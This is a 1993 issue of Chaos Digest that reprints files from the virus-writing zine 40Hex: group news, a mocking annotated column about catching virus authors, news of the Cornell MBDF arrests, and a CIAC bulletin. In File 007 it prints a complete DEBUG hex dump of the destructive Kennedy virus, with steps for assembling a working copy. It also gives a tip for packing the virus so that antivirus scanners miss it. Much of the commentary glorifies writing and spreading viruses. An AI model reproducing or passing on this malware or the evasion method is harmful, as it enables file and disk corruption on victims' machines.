Chaos Digest Mercredi 9 Juin 1993 Volume 1 : Numero 49 ISSN 1244-4901 Editeur: Jean-Bernard Condat (jbcondat@attmail.com) Archiviste: Yves-Marie Crabbe Co-Redacteurs: Arnaud Bigare, Stephane Briere TABLE DES MATIERES, #1.49 (9 Juin 1993) File 1--40H VMag Number 6 Volume 2 Issue 2 #005-008(1) (reprint) Chaos Digest is a weekly electronic journal/newsletter. Subscriptions are available at no cost by sending a message to: linux-activists-request@niksula.hut.fi with a mail header or first line containing the following informations: X-Mn-Admin: join CHAOS_DIGEST The editors may be contacted by voice (+33 1 47874083), fax (+33 1 47877070) or S-mail at: Jean-Bernard Condat, Chaos Computer Club France [CCCF], B.P. 155, 93404 St-Ouen Cedex, France. He is a member of the EICAR and EFF (#1299) groups. Issues of ChaosD can also be found from the ComNet in Luxembourg BBS (+352) 466893. Back issues of ChaosD can be found on the Internet as part of the Computer underground Digest archives. They're accessible using anonymous FTP: * kragar.eff.org [192.88.144.4] in /pub/cud/chaos * uglymouse.css.itd.umich.edu [141.211.182.53] in /pub/CuD/chaos * halcyon.com [192.135.191.2] in /pub/mirror/cud/chaos * ftp.cic.net [192.131.22.2] in /e-serials/alphabetic/c/chaos-digest * cs.ubc.ca [137.82.8.5] in /mirror3/EFF/cud/chaos * ftp.ee.mu.oz.au [128.250.77.2] in /pub/text/CuD/chaos * nic.funet.fi [128.214.6.100] in /pub/doc/cud/chaos * orchid.csv.warwick.ac.uk [137.205.192.5] in /pub/cud/chaos CHAOS DIGEST is an open forum dedicated to sharing French information among computerists and to the presentation and debate of diverse views. ChaosD material may be reprinted for non-profit as long as the source is cited. Some authors do copyright their material, and they should be contacted for reprint permission. Readers are encouraged to submit reasoned articles in French, English or German languages relating to computer culture and telecommunications. Articles are preferred to short responses. Please avoid quoting previous posts unless absolutely necessary. DISCLAIMER: The views represented herein do not necessarily represent the views of the moderators. Chaos Digest contributors assume all responsibility for ensuring that articles submitted do not violate copyright protections. ---------------------------------------------------------------------- Date: Tue May 11 09:24:40 PDT 1993 From: 0005847161@mcimail.com (American_Eagle_Publication_Inc. ) Subject: File 1--40H VMag Number 6 Volume 2 Issue 2 #005-008(1) (reprint) 40Hex Number 6 Volume 2 Issue 2 File 005 I'm back, well kind of. Anyways, a lot of people have been asking, "What's going on with the group?" The question should be, "What's going on with any group these days?" It seems to me that 1992 was the death of h/p, or at least the "ice age" of it. Everybody was either getting busted or quitting the scene. Oh well, what can I say about it. Our group has been having bad luck too. Five (now six) busted as well as other assorted bad things happening to members. Anyways, what's going on with us, huh?. Well the reason you haven't heard much from us is because we haven't been releasing our new stuff to BBS systems (BBS system sounds as redundant as PIN number, I know) because we have a strong feeling that members of such groups as the CVIA are logging on to h/p boards in the hope of snatching the latest viruses. Well not much you can do about it if you run a BBS, unless you personnally know everyone who calls your board. But come to think of it - what good does it prove to release your newest creation to the general public (of the h/p crowd) via BBS system? Isn't that the same principle as the warez puppy scene? I guess you all can do whatever turns you on but we kind of decided that it would be in our best interests to release our stuff to BBS's only after they have been detected by the popular scanners or until they are kind of old. Not to fear, 40-HEX and "Dark Angel Phunky Writing Guide" will still be on boards at the same rate as always. As for all of you people bitching that no longer have sites and that we are dead, well your dead - wrong. The current sites are as follows (in no specific order) - Digital Warfare (yes it's back, at a new number however), Time Lords BBS (The U.S.S.R System), The Phunline (yes it's back), and the newest addition - Crow Technology. And as for us being dead yeah right. ** Note from DecimatoR: The U.S.S.R System recently went down, due to Time Lord getting into a little hot water. It WILL return however... we're just not sure when. ** ** Note from GHeap: I am coming back, gimme mo' time! So now with that out of the way, on the other news. Hmmm... Michelangelo caused quite a scare there for a while. It was pretty cool to see John, Patti, and the rest of the crew on T.V... John Dvorak has a new half hour computer talk show on syndicated radio. I'm sure he wouldn't mind if we got on the show some time soon. Check your local radio guide for your local station and time... I am offering a standing bounty of $1,500 for the person willing to fly to Ohio and kick Crow Meisters ass for good. A minor would be preferred, being that he is under 18 and if I smashed him I could get sued or something. Just kidding, Crow Meister is cool with me, hihihihi... A new federal law is being considered which if passed will outlaw the authorship of computer viruses totally, research or not. Read more about that later in this issue... Hey, I might have a BBS up soon! I have been saying that for the past 2 years haven't I? Well that's the news as I see it, it's nice to be writing for this rag again. Check ya in 25 to life.... Hellraiser P/S 1992 This article was typed by Time Lord for HR cuz he is WAY too lazy to send me a disk in place of a fuckin print out... +++++ 40Hex Number 6 Volume 2 Issue 2 File 006 Well, this little news "tid-bit" came from Attitude Adjuster, one of the few non-PHALCON/SKISM contributers (ok, the ONLY non P/S member), Thanks a lot dude, keep the submissions coming. The article itself is quite sad, and makes me question the intelligence of our opposition. -)GHeap&Demo Thanx to CZ for THE line. --------------------------------------------------------------------------- - We need Computer Virus Snitches - Written By Mike Royko, Tribune Media Services. Retyped by The Attitude Adjuster =========================================================================== Millions of computer users are wondering how to protect themselves against the wave of viruses that are threatening their machines. I have a suggestion.[So do I, avoid Bnu 1.90Beta] First, they should remember that these viruses don't spring from nature. They are little computer programs that are created and sent on their way by people that are brainy, malicious and arrogant.[I am not brainy] So, the question is, how do you find the creators of computer virus programs? Because they are arrogant, it's likely that they want someone to know what a clever thing they have done. They won't hold a press conference [Actually, we do hold press conferences.See MichaelAlexander@Computerworld] but chances are they will brag to a trusted friend or acquaintance or fellow hacker. It is sad, but the world is full of snitches.[Get a thesaurus] Look at John Gotti, the nation's biggest Mafia boss. There was a time when it was unthinkable for even the lowest-level Mafia soldier to blab. But now Gotti has to sit in court while his former right-hand man tells about how they got people whacked. [We whack people too] So if Mafia figures can be persuaded to tattle[Na-na-na-na-na], is there any reason to believe that nerds have a greater sense of honor and loyalty? [Yes, we also have brains] Of course[.] not, but how do you get them to do it? Money. [Now yer talking... my mom is really the Dark Avenger, I want my money now.] These companies [what companies, I only hit hospitals] could use petty cash to place ads in the computer magazines and on the electronic bulletin boards. [Ok, call my BBS and post this tidbit. 40Hex now has ad space available] The ads would say something like: "A $50,000 reward for any information leading to the arrest and conviction of virus authors." [How can you convict a virus author. It isn't illegal. Go play Tank Wars.] The next question would be what to do with the virus makers once they have been caught. And that's the key to putting an end to the problem: something that could be posted on those electronic bulletin boards that might cause an aspiring virus-maker to go take a brisk walk instead. A judge would sit and listen to an attorney who would say some- thing like this: "Your honor, what we have here is an otherwise fine young man from a good family. His father is a brilliant scholar, and the son will someday be the same."[I am going to be a certified scholar when I grow up.] "What he did was no more than an intellectual prank, a cerebral challenge of sorts. Like the man who climbed Mount Everest because it was there, he created the virus and sent it fourth because it was there." Then, we can hope, the judge might say something like this: "Yes, I am impressed by the defendant's brain power. And I expected you to ask me to give him a slap on the wrist." "However, he is not a child. He is an adult. And I would think that so brilliant a grown man would know better than to amuse himself by screwing with the lives of strangers." [I haven't screwed one stranger] "It's as if he hid inside the businesses and institutions until they were closed and everyone had gone home. Then he came out and went through every filing cabinet and drawer and shredded or burned every bit of useful information he could find."[Cool! Lets try it.] "Now, counselor, what would you and your law partners say is some street mope [See Thesaurus] did that to your firm - crept in and destroyed every document in your offices? Including the names of clients that owe you money. Hah, you would be in here asking me to hang him from a tree."[I love hanging from trees] "So don't give me that smart kid from a good family routine. [I ain't smart, and family ain't good] He is a self-centered, insensitive, uncaring, arrogant goofball [And damn proud]. He didn't give a second thought to the chaos or heartbreak he would cause an adoption agency, a hardworking businessman or a medical clinic." [Yes I did. I aim for them.] "Therefore, I sentence him to the maximum sentence the law allows in the local jailhouse [0, NUL, ZIP-o, /dev/null, etc..], which is a really terrible place, filled with all sorts of crude, insensitive hulks." [Jay-walkers] "Bailiff, please get the defendent up off the floor and administer some smelling salts."[More like, why is the defendant laughing?] "And change his trousers, quickly."[Fuck you] []comments added by Demogorgon and GHeap =========================================================================== I hope you enjoyed that one as much as I did! Okay, I see some really neat things with this man's article. First off, I'm sure he's an adept programmer... that is, he can probably figure out how to get his VCR to tape something while he is off writing his brilliant articles. I enjoy his narrow-minded definition of virii (that was mentioned in 40Hex 5), of course, all virii are those evil overwriting, trigger date, resident, boot track infecting swine (yeah, he probably learned what a virus was from watching ABC News covering the Michaelangelo crisis!) I also enjoy his opinion that all virus authors are nerds. First off, what the hell is a nerd? I mean, I have written a virus before (not saying it was any good), but, I don't feel like a nerd! In fact, I feel quite superior to most of the idiots like this guy. And, I like his great statement about my loyalty. Yes, I'm gonna narc on [PHALCON/ [Forget this again, and die]]SKISM for $50,000!!! Yeah, right. There are a lot of narcs on this not-so good earth, so choose your friends wisely. I'm quite sure that ads on BBS's (electronic bulletin boards! No... cork ones!) would just sufficiently pump up user discussion of virii. I'm not scared of fed intervention, and I doubt any authors I know are either. This was touched on in 40Hex 5, virus authors are not responsible for the spread of their virii unless they are actively spreading them! I mean, it's not my fault that K-Rad Man sent my Hard Drive Blender (slices, dices, minces sectors) to 1000 Bible boards in Utah. Apparently it hasn't dawned on this guy that most virii are not written to be destructive. Actually, that's a lie. There are a lot of virii out there that are descructive, but that is changing. People like the PHALCON/SKISM crew realize that not everything must be destructive, opening the doors to much larger virus projects (ie Bobisms) One more thing... QUIT EQUATING THE WORD 'hacker' TO EVERY DAMN TYPE OF ELECTRONIC 'crime!!!' I'm gonna get this dude's phone #, I say we call him sometime... -The Attitude Adjuster- +++++ 40Hex Number 6 Volume 2 Issue 2 File 007 Lets see what good ole' Patty has to say about this: Virus Name: Kennedy Aliases: Dead Kennedy, 333, Kennedy-333 Scan ID: [Kennedy] V Status: Endangered Discovered: April, 1990 Symptoms: .COM growth; message on trigger dates (see text); crosslinking of files; lost clusters; FAT corruption Origin: Denmark Eff Length: 333 Bytes Type Code: PNCKF - Parasitic Non-Resident .COM Infector Detection Method: ViruScan, Pro-Scan, VirexPC, F-Prot, VirHunt 2.0+, NAV, IBM Scan 2.00+, AVTK 4.32+, VIRx 1.6+, CPAV 1.0+, Novi 1.0.1+, Sweep 2.3.1+, UTScan Removal Instructions: F-Prot, VirHunt 2.0+, or delete infected files General Comments: The Kennedy virus was isolated in April 1990. It is a generic infector of .COM files, including COMMAND.COM. This virus has three activation dates: June 6 (assassination of Robert Kennedy 1968), November 18 (death of Joseph Kennedy 1969), and November 22 (assassination of John F. Kennedy 1963) of any year. On activation, the virus will display a message the following message: "Kennedy is dead - long live 'The Dead Kennedys'" The following text strings can be found in the viral code: "\command.com" "The Dead Kennedys" Systems infected with the Kennedy virus will experience cross-linking of files, lost clusters, and file allocation table errors (including messages that the file allocation table is bad). --------------------------------Cut Here------------------------------------ n kennedy.com e 0100 E9 0C 00 90 90 90 CD 20 4B 65 6E 6E 65 64 79 E8 e 0110 00 00 5E 81 EE 0F 01 8B AC 0B 02 B4 2A CD 21 81 e 0120 FA 06 06 74 28 81 FA 12 0B 74 22 81 FA 16 0B 74 e 0130 1C 8D 94 0D 02 33 C9 B4 4E CD 21 72 09 E8 17 00 e 0140 72 04 B4 4F EB F3 8B C5 05 03 01 FF E0 8D 94 20 e 0150 02 B4 09 CD 21 EB EF B8 00 43 BA 9E 00 CD 21 89 e 0160 8C 55 02 B8 01 43 33 C9 CD 21 B8 02 3D CD 21 8B e 0170 D8 B4 3F 8D 94 52 02 8B FA B9 03 00 CD 21 80 3D e 0180 E9 74 05 E8 7E 00 F8 C3 8B 55 01 89 94 0B 02 33 e 0190 C9 B8 00 42 CD 21 8B D7 B9 02 00 B4 3F CD 21 81 e 01A0 3D 65 64 74 DE 33 D2 33 C9 B8 02 42 CD 21 83 FA e 01B0 00 75 D0 3D E8 FD 73 CB 05 04 00 89 84 5B 02 B8 e 01C0 00 57 CD 21 89 8C 57 02 89 94 59 02 B4 40 8D 94 e 01D0 05 01 B9 4D 01 CD 21 72 15 B8 00 42 33 C9 BA 01 e 01E0 00 CD 21 B4 40 8D 94 5B 02 B9 02 00 CD 21 8B 8C e 01F0 57 02 8B 94 59 02 B8 01 57 CD 21 B4 3E CD 21 E8 e 0200 02 00 F9 C3 B8 01 43 8B 8C 55 02 CD 21 C3 03 00 e 0210 2A 2E 43 4F 4D 00 5C 43 4F 4D 4D 41 4E 44 2E 43 e 0220 4F 4D 00 4B 65 6E 6E 65 64 79 20 65 72 20 64 9B e 0230 64 20 2D 20 6C 91 6E 67 65 20 6C 65 76 65 20 22 e 0240 54 68 65 20 44 65 61 64 20 4B 65 6E 6E 65 64 79 e 0250 73 22 0D 0A 24 00 00 00 00 00 00 00 00 00 00 00 e 0260 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e 0270 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 rcx 027F w q ---------------------------------Cut Here----------------------------------- Ok there it is. Not the most impressive virus around and its caught by just about every scan on the market, but take PKLite to it and then remove the PKLite header (Use NOLITE in this issue) and no one will be able to find it. Anyway it gets the job done. To make the above hex into a working file, first cut on the dotted lines. Name the resulting file KENNEDY.TXT. Then: DEBUG < KENNEDY.TXT and you'll have a working virus. -Instigator +++++ 40Hex Number 6 Volume 2 Issue 2 File 008 Take a look at this. I picked it up on fidonet, originally from Virus-L digest. all the stuff in *< >*'s are my comments. - Demogorgon ------------------------------ VIRUS-L Digest Wednesday, 26 Feb 1992 Volume 5 : Issue 44 ------------------------------ Date: Tue, 25 Feb 92 10:10:14 -0500 >From: mha@baka.ithaca.ny.us (Mark Anbinder) Subject: MBDF Suspects Arrested (Mac) The Cornell Daily Sun reported in this morning's issue that two Cornell University sophomores, David Blumenthal and Mark Pilgrim, were arrested Monday evening and arraigned in Ithaca City Court on one count each of second degree computer tampering, in connection with the release of the MBDF virus that infected Macs worldwide over the last several days. The two are being held in Tompkins County Jail. *< huh? How does one get arrested for spreading a virus, you ask? read on >* Further charges are pending. --- ** many lines of mail routing crap have been deleted ** Date: Tue, 25 Feb 1992 11:47:32 PST >From: lipa@camis.stanford.edu (Bill Lipa) Subject: Alleged MBDF virus-creators arrested at Cornell "Computer Virus Traced to Cornell Students" by Jeff Carmona [The Cornell Daily Sun, 25 February 1992] Two Cornell students were arrested yesterday for allegedly creating and launching *< launching ? Bon voyage, we launched you !>* a computer virus that crippled computers around the world, according to M. Stuart Lynn, the University's vice president for information technologies. David Blumenthal '94 and Mark Pilgrim '94 were arrested by Department of Public Safety officers and arraigned in Ithaca City Court on one count of second-degree computer tampering, a misdemeanor, *< cool, its only a misdemeanor, how bad could it be ? >* Lynn said. Both students were remanded to the Tompkins County Jail and remained in custody early this morning. They are being held on $2,000 cash or $10,000 bail bond, officials said. Cornell received national attention in Nov. 1988 when Robert T. Morris Jr., a former graduate student, was accused of unleashing a computer virus into thousands of government and university computers. Morris, convicted under the 1986 Computer Fraud and Abuse Act, was fined $10,000, given a three-year probation and ordered to do 400 hours of community service by a federal judge in Syracuse, according to Linda Grace- Kobas, *< Whats a Koba?? >* director of the Cornell News Service. Lynn would not compare the severity of the current case with Morris', saying that "each case is different." Lynn said the virus, called "MBDFA" was put into three Macintosh games -- Obnoxious Tetris, Tetriscycle and Ten Tile Puzzle. On Feb. 14, the games were launched from Cornell to a public archive at Stanford University in Palo Alto, Calif, Lynn said. *< I guess these guys actually put it up on the archive under their own >* *< accounts! Don't they know they can trace that stuff? duhhh... >* >From there, the virus spread to computers in Osaka, Japan and elsewhere around the world *< the archive was a dumb idea if thats how they got caught, but it spread like hell >* when users connected to computer networks via modems, he added. It is not known how many computers the virus has affected worldwide, he explained. When computer users downloaded the infected games, the virus caused "a modification of system software," *< oooh...lets not get too technical >* Lynn said. "This resulted in unusual behavior and system crashes," he added. Lynn said he was not aware of anyone at Cornell who reported finding the virus on their computers. The virus was traced to Cornell last Friday, authorities were quickly notified and an investigation began, Lynn said. "We absolutely deplore this kind of bahavior," Lynn said. "We will pursue this matter to the fullest." Armed with search warrants, Public Safety investigators removed more than a dozen crates full of evidence from the students' residences in Baker and Founders halls on West Campus. *< sounds like a typical, over-kill bust to me. If you don't know what it is, take it. >* Public Safety officials refused to disclose the contents of the crates or issue any comment about the incident when contacted repeatedly by phone last night. *< thats because they don't know what the fuck the stuff is >* "We believe this was dealt with very quickly and professionally," Lynn said. The suspects are scheduled to appear in Ithaca City Court at 1 p.m. today and additional charges are pending, according to Grace-Kobas. Because spreading a computer virus violates federal laws, "conceivably, the FBI could be involved," she added. Officials with the FBI could not be reached to confirm or deny this. Blumenthal and Pilgrim, both 19-year-olds, were current student employees at Cornell Information Technologies (CIT), Lynn said. He would not say whether the students launched the virus from their residence hall rooms or >From a CIT office. Henrik N. Dullea '61, vice president for University relations, said he thinks "the act will immediately be associated with the University," not only with the individual students charged. Because a major virus originated from a Cornell student in the past, this latest incident may again "bring a negative reaction to the entire institution," Dullea said. *< "blah, blah, blah" >* "These are very selfish acts," Lynn said, referring to the intentional distribution of computer viruses, because innocent people are harmed. Lynn said he was unaware of the students' motive for initiating the virus. Lynn said CIT put out a notice yesterday to inform computer users about the "very virulent" virus. A virus-protection program, such as the new version of Disinfectant, can usually cure computers, but it may be necessary to "rebuild the hard drive" *< egad! Not the dreaded "virus-that-makes-you-rebuild-your- hard-drive" !>* in some cases, he added. A former roommate of Blumenthal said he was not surprised by news of the arrest. Computers were "more than a hobby" for Blumenthal, said Glen Fuller '95, his roommate from last semester. "He was in front of the computer all day," Fuller said. Blumenthal, who had a modem, would "play around with viruses because they were a challenge to him," Fuller said. He said that, to his knowledge, Blumenthal had never released a virus before. -->-<------ Cut Here -------------------------- ------------------------------ VIRUS-L Digest Friday, 28 Feb 1992 Volume 5 : Issue 46 ------------------------------ Date: Wed, 26 Feb 92 11:08:45 -0800 >From: karyn@cheetah.llnl.gov (Karyn Pichnarczyk) Subject: CIAC Bulletin C-17: MBDF A on Macintosh (Mac) NO RESTRICTIONS _____________________________________________________ The Computer Incident Advisory Capability ___ __ __ _ ___ / | / \ / \___ __|__ /___\ \___ _____________________________________________________ INFORMATION BULLETIN New Virus on Macintosh Computers: MBDF A February 25, 1992, 1130 PST Number C-17 ________________________________________________________________________ NAME: MBDF A virus PLATFORM: Macintosh computers-except MacPlus and SE (see below) DAMAGE: May cause program crashes SYMPTOMS: Claris applications indicate they have been altered; some shareware may not work, unexplained system crashes DETECTION & ERADICATION: Disinfectant 2.6,Gatekeeper 1.2.4, Virex 3.6, VirusDetective 5.0.2, Rival 1.1.10, SAM 3.0 ________________________________________________________________________ Critical Facts about MBDF A A new Macintosh virus, MBDF A, (named for the resource it exploits) has been discovered. This virus does not appear to maliciously cause damage, but simply copies itself from one application to another. MBDF A was discovered at two archive sites in newly posted game applications, and has a high potential to be very widespread. Infection Mechanism This virus is an "implied loader" virus, and it works in a similar manner to other implied loader viruses such as CDEF and MDEF. Once the virus is active, clean appliacation programs will become infected as soon as they are executed. MBDF A infects only applications, and does not affect data files. This virus replicates under both System 6 and System 7. While MBDF A may be present on ALL types of Macintosh systems, it will not spread if the infected system is a MacPlus or a Mac SE (although it does spread on an SE/30). Potential Damage The MBDF A virus has no malicious damaging characteristics, however, it may cause programs to inexplicably crash when an item is selected from the menu bar. Some programs, such as the shareware "BeHierarchic" program, have been reported to not operate correctly when infected. Applications written with self-checking code, such as those written by the Claris corporation, will inform the user that they have been altered. When MBDF A infects the system file, it must re-write the entire system file back to disk; this process may take two or three minutes. If the user assumes the system has hung, and reboots the Macintosh while this is occuring, the entire system file will be corrupted and an entire reload of system software must then be performed. This virus can be safely eradicated from most infected programs, although CIAC recommends that you restore all infected files from an uninfected backup. ------------------------------ End of Chaos Digest #1.49 ************************************ Downloaded From P-80 International Information Systems 304-744-2253